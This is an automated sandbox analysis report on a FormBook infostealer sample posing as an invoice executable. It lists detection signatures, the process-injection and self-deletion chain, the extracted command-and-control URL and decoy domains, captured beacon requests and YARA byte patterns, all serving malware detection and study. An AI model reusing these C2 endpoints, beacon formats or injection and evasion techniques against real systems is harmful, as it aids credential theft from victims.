
Windows Analysis Report EXPORT INVOICE 2021.exe

Overview

General Information

Sample Name: EXPORT INVOICE 2021.exe
Analysis ID: 502233
MD5: 54bb8fbbfe0a665ca59579a0240ce2f0
SHA1: 0b97e4463c76df4541179880902bb6966ef3f894
SHA256: 3bd841c6957e9fdb7e9d4558fb417dca9d7317d087cdbbb270155d9a6698e657
Tags: exe, xloader

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Sigma detected: CMSTP Execution Process Creation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • EXPORT INVOICE 2021.exe (PID: 7128 cmdline: 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe' MD5: 54BB8FBBFE0A665CA59579A0240CE2F0)
    • EXPORT INVOICE 2021.exe (PID: 5548 cmdline: {path} MD5: 54BB8FBBFE0A665CA59579A0240CE2F0)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 1688 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 5860 cmdline: /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.vulcanopresale.icu/mqi9/"], "decoy": ["spectehnika-rb.com", "daleproaudio.xyz", "cpw887.com", "gosbs-b01.com", "clarkmanagementhawaii.com", "taobaoi68.xyz", "hoppedchardonnay.com", "extremesavings.net", "newbiepanda.com", "arul-jegadish.com", "kellibrat.com", "avto-mercury.info", "percussionportal.com", "colorfulworldpublishing.com", "notvaccinatedjobs.com", "cattavida.com", "pioniersa.com", "yanduy.com", "mzjing.com", "piedmontpines.school", "sosibibyslot.space", "yfly635.xyz", "undauntedearth.com", "ratqueen.art", "docomoat.xyz", "themysticalmushroom.com", "woodbinecommunityplan.com", "al-m3hd.com", "globalglodpower.com", "circuitboardsolution.com", "zoipartner.com", "varibat45.com", "sean-inspires.com", "533hd.com", "yuezhong66.com", "latewood.xyz", "mrsparberrysplace.com", "shyy-life.com", "znypay.com", "eludice.net", "kalitelihavaperdesi.com", "classicmusclecargarage.com", "divulgesloatr.xyz", "djkozmos.com", "eazyjspowerwash.com", "xn--naturecan-823hqc4t8089b.xyz", "merchediazcobo.com", "09mpt.xyz", "zapoartist.quest", "vagusartesaniaymoda.online", "blogbynasir.com", "cliffwoof.com", "aj03yansinbiz.biz", "gaboshoes.com", "italiangomvqs.xyz", "safari-fadel.com", "diorbijoux.com", "lookforwardswiss.com", "qsygqc.com", "wehaveunconditionallove.com", "kingsmeadfarm.com", "928711.com", "saint444.com", "fashiona.space"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bec:$sqlite3step: 68 34 1C 7B E1
  • 0x16b08:$sqlite3text: 68 38 2A 90 C5
  • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bec:$sqlite3step: 68 34 1C 7B E1
  • 0x16b08:$sqlite3text: 68 38 2A 90 C5
  • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
2.2.EXPORT INVOICE 2021.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.EXPORT INVOICE 2021.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

System Summary:

Sigma detected: CMSTP Execution Process Creation
Source: Process started, Author: Nik Seetharaman, Data: Command: /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe', CommandLine: /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmstp.exe, ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 1688, ProcessCommandLine: /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe', ProcessId: 5860

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Malware Configuration Extractor: FormBook (the extracted configuration is listed in full under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: EXPORT INVOICE 2021.exe, Virustotal: Detection: 32%
Source: EXPORT INVOICE 2021.exe, Metadefender: Detection: 17%
Yara detected FormBook
Source: Yara match, File source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORY
Machine Learning detection for sample
Source: EXPORT INVOICE 2021.exe, Joe Sandbox ML: detected
Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: EXPORT INVOICE 2021.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: EXPORT INVOICE 2021.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: cmstp.pdbGCTL, source: EXPORT INVOICE 2021.exe, 00000002.00000002.798051676.0000000001299000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP, source: EXPORT INVOICE 2021.exe, 00000002.00000002.798456430.0000000001530000.00000040.00000001.sdmp, cmstp.exe, 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb, source: EXPORT INVOICE 2021.exe, 00000002.00000002.798456430.0000000001530000.00000040.00000001.sdmp, cmstp.exe
Source: Binary string: cmstp.pdb, source: EXPORT INVOICE 2021.exe, 00000002.00000002.798051676.0000000001299000.00000004.00000020.sdmp

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe, Domain query: www.kalitelihavaperdesi.com
Source: C:\Windows\explorer.exe, Network Connect: 51.161.86.13 80
Source: C:\Windows\explorer.exe, Network Connect: 209.17.116.165 80
Source: C:\Windows\explorer.exe, Domain query: www.ratqueen.art
Source: C:\Windows\explorer.exe, Domain query: www.piedmontpines.school
Source: C:\Windows\explorer.exe, Domain query: www.yuezhong66.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.vulcanopresale.icu/mqi9/
Source: Joe Sandbox View, ASN Name: OVHFR OVHFR
Source: Joe Sandbox View, ASN Name: DEFENSE-NETUS DEFENSE-NETUS
Source: global traffic, HTTP traffic detected: GET /mqi9/?4heD=-Zg8bjv8BJx4HBw&z0=iv8Ag4bEJuIinTRZ0o23voggRtPwqtQ/ydF60y+S+AJP0Z2gEdIzW1gU1h5YO8GPbSLa HTTP/1.1, Host: www.ratqueen.art, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /mqi9/?z0=TImHsH9dZg2P5abYftozWuM8TNrG03iNFbmWCvRDMTsTbH54OyQX2B6DGU+4mOJFrbhV&4heD=-Zg8bjv8BJx4HBw HTTP/1.1, Host: www.piedmontpines.school, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: EXPORT INVOICE 2021.exe, 00000000.00000003.677421719.000000000155D000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: unknown, DNS traffic detected: queries for: www.ratqueen.art

E-Banking Fraud:

Yara detected FormBook
Source: Yara match, File source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample, Static PE information: Filename: EXPORT INVOICE 2021.exe
Source: EXPORT INVOICE 2021.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Windows\explorer.exe, Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_004185E0 NtCreateFile,
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_00418690 NtReadFile,
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_00418710 NtClose,
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_004187C0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_0041868A NtReadFile,
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_0041870A NtClose,
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_004187BB NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048BB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B99D0 NtCreateProcessEx,
